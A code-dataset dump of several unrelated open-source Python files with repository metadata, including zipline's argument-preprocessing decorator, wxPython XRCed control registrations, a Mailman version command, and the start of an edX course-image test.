client = docker.Client(base_url=base_url, version='1.15', timeout=10, tls=tls_config)
tag = args.tag or None
buildpath = args.buildpath[0]
def main():
docket.build(client=client, tag=tag, buildpath=buildpath, no_cache=args.no_cache)
exit()
if __name__ == '__main__':
main()
|
clarete/docket
|
docket/command_line.py
|
Python
|
mit
| 1,369 | 0.005844 |
"""
Utilities for validating inputs to user-facing API functions.
"""
from textwrap import dedent
from types import CodeType
from functools import wraps
from inspect import getargspec
from uuid import uuid4
from toolz.curried.operator import getitem
from six import viewkeys, exec_, PY3
_code_argorder = (
('co_argcount', 'co_kwonlyargcount') if PY3 else ('co_argcount',)
) + (
'co_nlocals',
'co_stacksize',
'co_flags',
'co_code',
'co_consts',
'co_names',
'co_varnames',
'co_filename',
'co_name',
'co_firstlineno',
'co_lnotab',
'co_freevars',
'co_cellvars',
)
NO_DEFAULT = object()
def preprocess(*_unused, **processors):
"""
Decorator that applies pre-processors to the arguments of a function before
calling the function.
Parameters
----------
**processors : dict
Map from argument name -> processor function.
A processor function takes three arguments: (func, argname, argvalue).
`func` is the the function for which we're processing args.
`argname` is the name of the argument we're processing.
`argvalue` is the value of the argument we're processing.
Examples
--------
>>> def _ensure_tuple(func, argname, arg):
... if isinstance(arg, tuple):
... return argvalue
... try:
... return tuple(arg)
... except TypeError:
... raise TypeError(
... "%s() expected argument '%s' to"
... " be iterable, but got %s instead." % (
... func.__name__, argname, arg,
... )
... )
...
>>> @preprocess(arg=_ensure_tuple)
... def foo(arg):
... return arg
...
>>> foo([1, 2, 3])
(1, 2, 3)
>>> foo("a")
('a',)
>>> foo(2)
Traceback (most recent call last):
...
TypeError: foo() expected argument 'arg' to be iterable, but got 2 instead.
"""
if _unused:
raise TypeError("preprocess() doesn't accept positional arguments")
def _decorator(f):
args, varargs, varkw, defaults = argspec = getargspec(f)
if defaults is None:
defaults = ()
no_defaults = (NO_DEFAULT,) * (len(args) - len(defaults))
args_defaults = list(zip(args, no_defaults + defaults))
if varargs:
args_defaults.append((varargs, NO_DEFAULT))
if varkw:
args_defaults.append((varkw, NO_DEFAULT))
argset = set(args) | {varargs, varkw} - {None}
# Arguments can be declared as tuples in Python 2.
if not all(isinstance(arg, str) for arg in args):
raise TypeError(
"Can't validate functions using tuple unpacking: %s" %
(argspec,)
)
# Ensure that all processors map to valid names.
bad_names = viewkeys(processors) - argset
if bad_names:
raise TypeError(
"Got processors for unknown arguments: %s." % bad_names
)
return _build_preprocessed_function(
f, processors, args_defaults, varargs, varkw,
)
return _decorator
def call(f):
"""
Wrap a function in a processor that calls `f` on the argument before
passing it along.
Useful for creating simple arguments to the `@preprocess` decorator.
Parameters
----------
f : function
Function accepting a single argument and returning a replacement.
Examples
--------
>>> @preprocess(x=call(lambda x: x + 1))
... def foo(x):
... return x
...
>>> foo(1)
2
"""
@wraps(f)
def processor(func, argname, arg):
return f(arg)
return processor
def _build_preprocessed_function(func,
processors,
args_defaults,
varargs,
varkw):
"""
Build a preprocessed function with the same signature as `func`.
Uses `exec` internally to build a function that actually has the same
signature as `func.
"""
format_kwargs = {'func_name': func.__name__}
def mangle(name):
return 'a' + uuid4().hex + name
format_kwargs['mangled_func'] = mangled_funcname = mangle(func.__name__)
def make_processor_assignment(arg, processor_name):
template = "{arg} = {processor}({func}, '{arg}', {arg})"
return template.format(
arg=arg,
processor=processor_name,
func=mangled_funcname,
)
exec_globals = {mangled_funcname: func, 'wraps': wraps}
defaults_seen = 0
default_name_template = 'a' + uuid4().hex + '_%d'
signature = []
call_args = []
assignments = []
star_map = {
varargs: '*',
varkw: '**',
}
def name_as_arg(arg):
return star_map.get(arg, '') + arg
for arg, default in args_defaults:
if default is NO_DEFAULT:
signature.append(name_as_arg(arg))
else:
default_name = default_name_template % defaults_seen
exec_globals[default_name] = default
signature.append('='.join([name_as_arg(arg), default_name]))
defaults_seen += 1
if arg in processors:
procname = mangle('_processor_' + arg)
exec_globals[procname] = processors[arg]
assignments.append(make_processor_assignment(arg, procname))
call_args.append(name_as_arg(arg))
exec_str = dedent(
"""\
@wraps({wrapped_funcname})
def {func_name}({signature}):
{assignments}
return {wrapped_funcname}({call_args})
"""
).format(
func_name=func.__name__,
signature=', '.join(signature),
assignments='\n '.join(assignments),
wrapped_funcname=mangled_funcname,
call_args=', '.join(call_args),
)
compiled = compile(
exec_str,
func.__code__.co_filename,
mode='exec',
)
exec_locals = {}
exec_(compiled, exec_globals, exec_locals)
new_func = exec_locals[func.__name__]
code = new_func.__code__
args = {
attr: getattr(code, attr)
for attr in dir(code)
if attr.startswith('co_')
}
# Copy the firstlineno out of the underlying function so that exceptions
# get raised with the correct traceback.
# This also makes dynamic source inspection (like IPython `??` operator)
# work as intended.
try:
# Try to get the pycode object from the underlying function.
original_code = func.__code__
except AttributeError:
try:
# The underlying callable was not a function, try to grab the
# `__func__.__code__` which exists on method objects.
original_code = func.__func__.__code__
except AttributeError:
# The underlying callable does not have a `__code__`. There is
# nothing for us to correct.
return new_func
args['co_firstlineno'] = original_code.co_firstlineno
new_func.__code__ = CodeType(*map(getitem(args), _code_argorder))
return new_func
|
bartosh/zipline
|
zipline/utils/preprocess.py
|
Python
|
apache-2.0
| 7,205 | 0 |
# Name: controls.py
# Purpose: Control components
# Author: Roman Rolinsky <rolinsky@femagsoft.com>
# Created: 31.05.2007
# RCS-ID: $Id: core.py 47823 2007-07-29 19:24:35Z ROL $
from wx.tools.XRCed import component, images, attribute, params
from wx.tools.XRCed.globals import TRACE
import _bitmaps as bitmaps
TRACE('*** creating control components')
# Set panel images
component.Manager.panelImages['Controls'] = images.ToolPanel_Controls.GetImage()
### wxStaticText
c = component.Component('wxStaticText', ['control','tool'],
['pos', 'size', 'label', 'wrap'], defaults={'label': 'LABEL'},
image=images.TreeStaticText.GetImage())
c.addStyles('wxALIGN_LEFT', 'wxALIGN_RIGHT', 'wxALIGN_CENTRE', 'wxST_NO_AUTORESIZE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'label', 'wxStaticText', 10)
component.Manager.setTool(c, 'Controls', pos=(0,0))
### wxStaticLine
c = component.Component('wxStaticLine', ['control','tool'],
['pos', 'size'], image=images.TreeStaticLine.GetImage())
c.addStyles('wxLI_HORIZONTAL', 'wxLI_VERTICAL')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'line', 'wxStaticLine', 20)
component.Manager.setTool(c, 'Controls', pos=(0,3))
### wxStaticBitmap
c = component.Component('wxStaticBitmap', ['control','tool'],
['pos', 'size', 'bitmap'],
image=images.TreeStaticBitmap.GetImage())
c.setSpecial('bitmap', attribute.BitmapAttribute)
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'bitmap', 'wxStaticLine', 30)
component.Manager.setTool(c, 'Controls', pos=(1,0))
### wxTextCtrl
c = component.Component('wxTextCtrl', ['control','tool'],
['pos', 'size', 'value'],
image=images.TreeTextCtrl.GetImage())
c.addStyles('wxTE_NO_VSCROLL',
'wxTE_AUTO_SCROLL',
'wxTE_PROCESS_ENTER',
'wxTE_PROCESS_TAB',
'wxTE_MULTILINE',
'wxTE_PASSWORD',
'wxTE_READONLY',
'wxHSCROLL',
'wxTE_RICH',
'wxTE_RICH2',
'wxTE_AUTO_URL',
'wxTE_NOHIDESEL',
'wxTE_LEFT',
'wxTE_CENTRE',
'wxTE_RIGHT',
'wxTE_DONTWRAP',
'wxTE_LINEWRAP',
'wxTE_CHARWRAP',
'wxTE_WORDWRAP')
c.setParamClass('value', params.ParamMultilineText)
c.addEvents('EVT_TEXT', 'EVT_TEXT_ENTER', 'EVT_TEXT_URL', 'EVT_TEXT_MAXLEN')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'text ctrl', 'wxTextCtrl', 40)
component.Manager.setTool(c, 'Controls', pos=(0,2))
### wxChoice
c = component.Component('wxChoice', ['control','tool'],
['pos', 'size', 'content', 'selection'],
image=images.TreeChoice.GetImage())
c.addStyles('wxCB_SORT')
c.setSpecial('content', attribute.ContentAttribute)
c.addEvents('EVT_CHOICE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'choice', 'wxChoice', 50)
component.Manager.setTool(c, 'Controls', pos=(3,2))
### wxSlider
c = component.Component('wxSlider', ['control','tool'],
['pos', 'size', 'value', 'min', 'max',
'tickfreq', 'pagesize', 'linesize', 'thumb', 'tick',
'selmin', 'selmax'],
image=images.TreeSlider.GetImage())
c.addStyles('wxSL_HORIZONTAL', 'wxSL_VERTICAL', 'wxSL_AUTOTICKS', 'wxSL_LABELS',
'wxSL_LEFT', 'wxSL_RIGHT', 'wxSL_TOP', 'wxSL_BOTTOM',
'wxSL_BOTH', 'wxSL_SELRANGE', 'wxSL_INVERSE')
component.Manager.register(c)
c.setParamClass('value', params.ParamInt)
c.setParamClass('tickfreq', params.ParamIntNN)
c.setParamClass('pagesize', params.ParamIntNN)
c.setParamClass('linesize', params.ParamIntNN)
c.setParamClass('thumb', params.ParamUnit)
c.setParamClass('tick', params.ParamInt)
c.setParamClass('selmin', params.ParamInt)
c.setParamClass('selmax', params.ParamInt)
c.addEvents('EVT_SCROLL', 'EVT_SCROLL_TOP', 'EVT_SCROLL_BOTTOM',
'EVT_SCROLL_LINEUP', 'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK', 'EVT_SCROLL_THUMBRELEASE',
'EVT_SCROLL_CHANGED', 'EVT_SCROLL', 'EVT_SCROLL_TOP',
'EVT_SCROLL_BOTTOM', 'EVT_SCROLL_LINEUP',
'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK',
'EVT_SCROLL_THUMBRELEASE', 'EVT_SCROLL_CHANGED')
component.Manager.setMenu(c, 'control', 'slider', 'wxSlider', 60)
component.Manager.setTool(c, 'Controls', pos=(2,3))
### wxGauge
c = component.Component('wxGauge', ['control','tool'],
['pos', 'size', 'range', 'value', 'shadow', 'bezel'],
image=images.TreeGauge.GetImage())
c.addStyles('wxGA_HORIZONTAL', 'wxGA_VERTICAL', 'wxGA_PROGRESSBAR', 'wxGA_SMOOTH')
c.setParamClass('range', params.ParamIntNN)
c.setParamClass('value', params.ParamIntNN)
c.setParamClass('shadow', params.ParamUnit)
c.setParamClass('bezel', params.ParamUnit)
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'gauge', 'wxGauge', 70)
component.Manager.setTool(c, 'Controls', pos=(1,3))
### wxSpinCtrl
c = component.Component('wxSpinCtrl', ['control','tool'],
['pos', 'size', 'value', 'min', 'max'],
image=images.TreeSpinCtrl.GetImage())
c.addStyles('wxSP_HORIZONTAL', 'wxSP_VERTICAL', 'wxSP_ARROW_KEYS', 'wxSP_WRAP')
c.setParamClass('value', params.ParamInt)
c.addEvents('EVT_SPINCTRL')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'spin ctrl', 'wxSpinCtrl', 80)
component.Manager.setTool(c, 'Controls', pos=(1,2))
### wxScrollBar
c = component.Component('wxScrollBar', ['control'],
['pos', 'size', 'value', 'thumbsize', 'range', 'pagesize'],
image=images.TreeScrollBar.GetImage())
c.addStyles('wxSB_HORIZONTAL', 'wxSB_VERTICAL')
c.setParamClass('range', params.ParamIntNN)
c.setParamClass('value', params.ParamIntNN)
c.setParamClass('thumbsize', params.ParamUnit)
c.setParamClass('pagesize', params.ParamUnit)
c.addEvents('EVT_SCROLL', 'EVT_SCROLL_TOP', 'EVT_SCROLL_BOTTOM',
'EVT_SCROLL_LINEUP', 'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK', 'EVT_SCROLL_THUMBRELEASE',
'EVT_SCROLL_CHANGED', 'EVT_SCROLL', 'EVT_SCROLL_TOP',
'EVT_SCROLL_BOTTOM', 'EVT_SCROLL_LINEUP',
'EVT_SCROLL_LINEDOWN', 'EVT_SCROLL_PAGEUP',
'EVT_SCROLL_PAGEDOWN', 'EVT_SCROLL_THUMBTRACK',
'EVT_SCROLL_THUMBRELEASE', 'EVT_SCROLL_CHANGED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'scroll bar', 'wxScrollBar', 90)
component.Manager.setTool(c, 'Controls', pos=(3,3))
### wxListCtrl
c = component.Component('wxListCtrl', ['control','tool'], ['pos', 'size'],
image=images.TreeListCtrl.GetImage())
c.addStyles('wxLC_LIST', 'wxLC_REPORT', 'wxLC_ICON', 'wxLC_SMALL_ICON',
'wxLC_ALIGN_TOP', 'wxLC_ALIGN_LEFT', 'wxLC_AUTOARRANGE',
'wxLC_USER_TEXT', 'wxLC_EDIT_LABELS', 'wxLC_NO_HEADER',
'wxLC_SINGLE_SEL', 'wxLC_SORT_ASCENDING', 'wxLC_SORT_DESCENDING',
'wxLC_VIRTUAL', 'wxLC_HRULES', 'wxLC_VRULES', 'wxLC_NO_SORT_HEADER')
c.addEvents('EVT_LIST_BEGIN_DRAG',
'EVT_LIST_BEGIN_RDRAG',
'EVT_LIST_BEGIN_LABEL_EDIT',
'EVT_LIST_END_LABEL_EDIT',
'EVT_LIST_DELETE_ITEM',
'EVT_LIST_DELETE_ALL_ITEMS',
'EVT_LIST_ITEM_SELECTED',
'EVT_LIST_ITEM_DESELECTED',
'EVT_LIST_KEY_DOWN',
'EVT_LIST_INSERT_ITEM',
'EVT_LIST_COL_CLICK',
'EVT_LIST_ITEM_RIGHT_CLICK',
'EVT_LIST_ITEM_MIDDLE_CLICK',
'EVT_LIST_ITEM_ACTIVATED',
'EVT_LIST_CACHE_HINT',
'EVT_LIST_COL_RIGHT_CLICK',
'EVT_LIST_COL_BEGIN_DRAG',
'EVT_LIST_COL_DRAGGING',
'EVT_LIST_COL_END_DRAG',
'EVT_LIST_ITEM_FOCUSED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'list ctrl', 'wxListCtrl', 100)
component.Manager.setTool(c, 'Panels', pos=(0,1))
### wxTreeCtrl
c = component.Component('wxTreeCtrl', ['control','tool'], ['pos', 'size'],
image=images.TreeTreeCtrl.GetImage())
c.addStyles('wxTR_EDIT_LABELS',
'wxTR_NO_BUTTONS',
'wxTR_HAS_BUTTONS',
'wxTR_TWIST_BUTTONS',
'wxTR_NO_LINES',
'wxTR_FULL_ROW_HIGHLIGHT',
'wxTR_LINES_AT_ROOT',
'wxTR_HIDE_ROOT',
'wxTR_ROW_LINES',
'wxTR_HAS_VARIABLE_ROW_HEIGHT',
'wxTR_SINGLE',
'wxTR_MULTIPLE',
'wxTR_EXTENDED',
'wxTR_DEFAULT_STYLE')
c.addEvents('EVT_TREE_BEGIN_DRAG',
'EVT_TREE_BEGIN_RDRAG',
'EVT_TREE_BEGIN_LABEL_EDIT',
'EVT_TREE_END_LABEL_EDIT',
'EVT_TREE_DELETE_ITEM',
'EVT_TREE_GET_INFO',
'EVT_TREE_SET_INFO',
'EVT_TREE_ITEM_EXPANDED',
'EVT_TREE_ITEM_EXPANDING',
'EVT_TREE_ITEM_COLLAPSED',
'EVT_TREE_ITEM_COLLAPSING',
'EVT_TREE_SEL_CHANGED',
'EVT_TREE_SEL_CHANGING',
'EVT_TREE_KEY_DOWN',
'EVT_TREE_ITEM_ACTIVATED',
'EVT_TREE_ITEM_RIGHT_CLICK',
'EVT_TREE_ITEM_MIDDLE_CLICK',
'EVT_TREE_END_DRAG',
'EVT_TREE_STATE_IMAGE_CLICK',
'EVT_TREE_ITEM_GETTOOLTIP',
'EVT_TREE_ITEM_MENU')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'tree ctrl', 'wxTreeCtrl', 110)
component.Manager.setTool(c, 'Panels', pos=(0,2))
### wxHtmlWindow
c = component.Component('wxHtmlWindow', ['control'],
['pos', 'size', 'borders', 'url', 'htmlcode'])
c.addStyles('wxHW_SCROLLBAR_NEVER', 'wxHW_SCROLLBAR_AUTO', 'wxHW_NO_SELECTION')
c.setParamClass('url', params.ParamLongText)
c.setParamClass('htmlcode', params.ParamMultilineText)
c.addEvents('EVT_HTML_CELL_CLICKED', 'EVT_HTML_CELL_HOVER',
'EVT_HTML_LINK_CLICKED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'HTML window', 'wxHtmlWindow', 120)
### wxCalendarCtrl
c = component.Component('wxCalendarCtrl', ['control', 'tool'], ['pos', 'size'])
c.addStyles('wxCAL_SUNDAY_FIRST', 'wxCAL_MONDAY_FIRST', 'wxCAL_SHOW_HOLIDAYS',
'wxCAL_NO_YEAR_CHANGE', 'wxCAL_NO_MONTH_CHANGE',
'wxCAL_SEQUENTIAL_MONTH_SELECTION', 'wxCAL_SHOW_SURROUNDING_WEEKS')
c.addEvents('EVT_CALENDAR_SEL_CHANGED', 'EVT_CALENDAR_DAY_CHANGED',
'EVT_CALENDAR_MONTH_CHANGED', 'EVT_CALENDAR_YEAR_CHANGED',
'EVT_CALENDAR_DOUBLECLICKED', 'EVT_CALENDAR_WEEKDAY_CLICKED')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'calendar ctrl', 'wxCalendarCtrl', 130)
### wxGenericDirCtrl
c = component.Component('wxGenericDirCtrl', ['control'],
['pos', 'size', 'defaultfolder', 'filter', 'defaultfilter'])
c.addStyles('wxDIRCTRL_DIR_ONLY', 'wxDIRCTRL_3D_INTERNAL', 'wxDIRCTRL_SELECT_FIRST',
'wxDIRCTRL_SHOW_FILTERS', 'wxDIRCTRL_EDIT_LABELS')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'generic dir ctrl', 'wxGenericDirCtrl', 160)
### wxFilePickerCtrl
c = component.Component('wxFilePickerCtrl', ['control'],
['pos', 'size', 'value', 'message', 'wildcard'])
c.addStyles('wxFLP_OPEN', 'wxFLP_SAVE', 'wxFLP_OVERWRITE_PROMPT',
'wxFLP_FILE_MUST_EXIST', 'wxFLP_CHANGE_DIR',
'wxFLP_DEFAULT_STYLE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'file picker ctrl', 'wxFilePickerCtrl', 170)
component.Manager.setTool(c, 'Controls', pos=(4,2))
### wxDatePickerCtrl
c = component.Component('wxDatePickerCtrl', ['control'], ['pos', 'size', 'borders'])
c.addStyles('wxDP_DEFAULT', 'wxDP_SPIN', 'wxDP_DROPDOWN',
'wxDP_ALLOWNONE', 'wxDP_SHOWCENTURY')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'date picker ctrl', 'wxDateCtrl', 180)
### wxGrid
c = component.Component('wxGrid', ['control'], ['pos', 'size'])
c.addEvents('EVT_GRID_CELL_LEFT_CLICK',
'EVT_GRID_CELL_RIGHT_CLICK',
'EVT_GRID_CELL_LEFT_DCLICK',
'EVT_GRID_CELL_RIGHT_DCLICK',
'EVT_GRID_LABEL_LEFT_CLICK',
'EVT_GRID_LABEL_RIGHT_CLICK',
'EVT_GRID_LABEL_LEFT_DCLICK',
'EVT_GRID_LABEL_RIGHT_DCLICK',
'EVT_GRID_ROW_SIZE',
'EVT_GRID_COL_SIZE',
'EVT_GRID_RANGE_SELECT',
'EVT_GRID_CELL_CHANGE',
'EVT_GRID_SELECT_CELL',
'EVT_GRID_EDITOR_SHOWN',
'EVT_GRID_EDITOR_HIDDEN',
'EVT_GRID_EDITOR_CREATED',
'EVT_GRID_CELL_BEGIN_DRAG')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'grid', 'wxGrid', 190)
component.Manager.setTool(c, 'Panels', pos=(2,1), span=(1,2))
### wxHyperlinkCtrl
c = component.Component('wxHyperlinkCtrl', ['control','tool'],
['pos', 'size', 'label', 'url'],
params={'url': params.ParamText},
defaults={'url': 'http://'})
c.addStyles('wxHL_CONTEXTMENU', 'wxHL_ALIGN_LEFT', 'wxHL_ALIGN_RIGHT',
'wxHL_ALIGN_CENTRE', 'wxHL_DEFAULT_STYLE')
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'hyperlink', 'wxHyperlinkCtrl', 200)
component.Manager.setTool(c, 'Controls', pos=(3,0))
################################################################################
# Buttons
### wxButton
c = component.Component('wxButton', ['control', 'tool', 'stdbtn'],
['pos', 'size', 'label', 'default'],
image=images.TreeButton.GetImage())
c.addStyles('wxBU_LEFT', 'wxBU_TOP', 'wxBU_RIGHT', 'wxBU_BOTTOM', 'wxBU_EXACTFIT',
'wxNO_BORDER')
c.setParamClass('default', params.ParamBool)
c.addEvents('EVT_BUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'button', 'wxButton', 10)
component.Manager.setTool(c, 'Controls', pos=(0,1))
### wxBitmapButton
c = component.Component('wxBitmapButton', ['control', 'tool'],
['pos', 'size', 'default',
'bitmap', 'selected', 'focus', 'disabled', 'hover'],
image=images.TreeBitmapButton.GetImage())
c.addStyles('wxBU_AUTODRAW', 'wxBU_LEFT', 'wxBU_RIGHT', 'wxBU_TOP', 'wxBU_BOTTOM',
'wxBU_EXACTFIT')
c.setParamClass('default', params.ParamBool)
c.setSpecial('bitmap', attribute.BitmapAttribute)
c.setSpecial('selected', attribute.BitmapAttribute)
c.setParamClass('selected', params.ParamBitmap)
c.setSpecial('focus', attribute.BitmapAttribute)
c.setParamClass('focus', params.ParamBitmap)
c.setSpecial('disabled', attribute.BitmapAttribute)
c.setParamClass('disabled', params.ParamBitmap)
c.setSpecial('hover', attribute.BitmapAttribute)
c.setParamClass('hover', params.ParamBitmap)
c.addEvents('EVT_BUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'bitmap button', 'wxBitmapButton', 20)
component.Manager.setTool(c, 'Controls', pos=(1,1))
### wxRadioButton
c = component.Component('wxRadioButton', ['control', 'tool'],
['pos', 'size', 'label', 'value'],
image=images.TreeRadioButton.GetImage())
c.addStyles('wxRB_GROUP', 'wxRB_SINGLE')
c.setParamClass('value', params.ParamBool)
c.addEvents('EVT_RADIOBUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'radio button', 'wxRadioButton', 30)
component.Manager.setTool(c, 'Controls', pos=(3,1))
### wxSpinButton
c = component.Component('wxSpinButton', ['control', 'tool'],
['pos', 'size', 'value', 'min', 'max'],
image=images.TreeSpinButton.GetImage())
c.addStyles('wxSP_HORIZONTAL', 'wxSP_VERTICAL', 'wxSP_ARROW_KEYS', 'wxSP_WRAP')
c.addEvents('EVT_SPIN', 'EVT_SPIN_UP', 'EVT_SPIN_DOWN')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'spin button', 'wxSpinButton', 40)
component.Manager.setTool(c, 'Controls', pos=(2,0))
### wxToggleButton
c = component.Component('wxToggleButton', ['control', 'tool'],
['pos', 'size', 'label', 'checked'],
image=images.TreeToggleButton.GetImage())
c.addEvents('EVT_TOGGLEBUTTON')
component.Manager.register(c)
component.Manager.setMenu(c, 'button', 'toggle button', 'wxToggleButton', 50)
component.Manager.setTool(c, 'Controls', pos=(2,1))
################################################################################
# Boxes
### wxCheckBox
c = component.Component('wxCheckBox', ['control','tool'],
['pos', 'size', 'label', 'checked'],
image=images.TreeCheckBox.GetImage())
c.addEvents('EVT_CHECKBOX')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'check box', 'wxCheckBox', 10)
component.Manager.setTool(c, 'Controls', pos=(4,1))
### wxComboBox
c = component.Component('wxComboBox', ['control','tool'],
['pos', 'size', 'content', 'selection', 'value'],
image=images.TreeComboBox.GetImage())
c.addStyles('wxCB_SINGLE', 'wxCB_DROPDOWN', 'wxCB_READONLY',
'wxCB_SORT', 'wxTE_PROCESS_ENTER')
c.setSpecial('content', attribute.ContentAttribute)
c.addEvents('EVT_COMBOBOX', 'EVT_TEXT', 'EVT_TEXT_ENTER')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'combo box', 'wxComboBox', 20)
component.Manager.setTool(c, 'Controls', pos=(2,2))
### wxRadioBox
c = component.Component('wxRadioBox', ['control','tool'],
['pos', 'size', 'label', 'dimension',
'content', 'selection', 'dimension'])
c.addStyles('wxRA_SPECIFY_ROWS', 'wxRA_SPECIFY_COLS')
c.setSpecial('content', attribute.ContentAttribute)
c.setParamClass('dimension', params.ParamInt)
c.addEvents('EVT_RADIOBOX')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'radio box', 'wxRadioBox', 30)
#component.Manager.setTool(c, 'Panels')
### wxListBox
c = component.Component('wxListBox', ['control','tool'],
['pos', 'size', 'content', 'selection'],
image=images.TreeListBox.GetImage())
c.addStyles('wxLB_SINGLE', 'wxLB_MULTIPLE', 'wxLB_EXTENDED', 'wxLB_HSCROLL',
'wxLB_ALWAYS_SB', 'wxLB_NEEDED_SB', 'wxLB_SORT')
c.setSpecial('content', attribute.ContentAttribute)
c.addEvents('EVT_LISTBOX', 'EVT_LISTBOX_DCLICK')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'list box', 'wxListBox', 40)
component.Manager.setTool(c, 'Panels', pos=(0,0))
### wxCheckListBox
c = component.Component('wxCheckListBox', ['control','tool'],
['pos', 'size', 'content', 'selection'])
c.addStyles('wxLB_SINGLE', 'wxLB_MULTIPLE', 'wxLB_EXTENDED', 'wxLB_HSCROLL',
'wxLB_ALWAYS_SB', 'wxLB_NEEDED_SB', 'wxLB_SORT')
c.setSpecial('content', attribute.CheckContentAttribute)
c.setParamClass('content', params.ParamContentCheckList)
c.addEvents('EVT_CHECKLISTBOX')
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'check list box', 'wxCheckListBox', 50)
#component.Manager.setTool(c, 'Panels', pos=(0,0))
### wxStaticBox
c = component.Component('wxStaticBox', ['control','tool'],
['pos', 'size', 'label'],
image=images.TreeStaticBox.GetImage())
component.Manager.register(c)
component.Manager.setMenu(c, 'box', 'static box', 'wxStaticBox', 60)
component.Manager.setTool(c, 'Panels', pos=(2,0))
### unknown
c = component.Component('unknown', ['control'], ['pos', 'size'])
component.Manager.register(c)
component.Manager.setMenu(c, 'control', 'unknown', 'unknown control')
### wxXXX
#c = component.Component('wxXXX', ['control','tool'],
# ['pos', 'size', ...])
#c.addStyles(...)
#component.Manager.register(c)
#component.Manager.setMenu(c, 'control', 'XXX', 'wxXXX', NN)
|
163gal/Time-Line
|
libs64/wx/tools/XRCed/plugins/controls.py
|
Python
|
gpl-3.0
| 19,978 | 0.00866 |
# Copyright (C) 2009-2012 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""The Mailman version."""
from __future__ import absolute_import, print_function, unicode_literals
__metaclass__ = type
__all__ = [
'Version',
]
from zope.interface import implementer
from mailman.interfaces.command import ICLISubCommand
from mailman.version import MAILMAN_VERSION_FULL
@implementer(ICLISubCommand)
class Version:
"""Mailman's version."""
name = 'version'
def add(self, parser, command_parser):
"""See `ICLISubCommand`."""
# No extra options.
pass
def process(self, args):
"""See `ICLISubCommand`."""
print(MAILMAN_VERSION_FULL)
|
hcs/mailman
|
src/mailman/commands/cli_version.py
|
Python
|
gpl-3.0
| 1,359 | 0.000736 |
#
# Copyright 2007-2009 Fedora Unity Project (http://fedoraunity.org)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2, or (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
__license__ = "GNU GPLv2+"
__version__ = "Git Development Hacking"
|
sanjayankur31/pyjigdo
|
pyJigdo/__init__.py
|
Python
|
gpl-2.0
| 827 | 0 |
"""
Tests for functionality in openedx/core/lib/courses.py.
"""
import ddt
from django.test.utils import override_settings
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
from ..courses import course_image_url
@ddt.ddt
class CourseImageTestCase(ModuleStoreTestCase):
"""Tests for course image URLs."""
shard = 2
def verify_url(self, expected_url, actual_url):
"""
Helper method for verifying the URL is as expected.
"""
if not expected_url.startswith("/"):
expected_url = "/" + expected_url
self.assertEquals(expected_url, actual_url)
def test_get_image_url(self):
"""Test image URL formatting."""
course = CourseFactory.create()
self.verify_url(
unicode(course.id.make_asset_key('asset', course.course_image)),
course_image_url(course)
)
def test_non_ascii_image_name(self):
""" Verify that non-ascii image names are cleaned """
course_image = u'before_\N{SNOWMAN}_after.jpg'
course = CourseFactory.create(course_image=course_image)
self.verify_url(
unicode(course.id.make_asset_key('asset', course_image.replace(u'\N{SNOWMAN}', '_'))),
course_image_url(course)
)
def test_spaces_in_image_name(self):
""" Verify that image names with spaces in them are cleaned """
course_image = u'before after.jpg'
course = CourseFactory.create(course_image=u'before after.jpg')
self.verify_url(
unicode(course.id.make_asset_key('asset', course_image.replace(" ", "_"))),
course_image_url(course)
)
@override_settings(DEFAULT_COURSE_ABOUT_IMAGE_URL='test.png')
@override_settings(STATIC_URL='static/')
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_empty_image_name(self, default_store):
"""
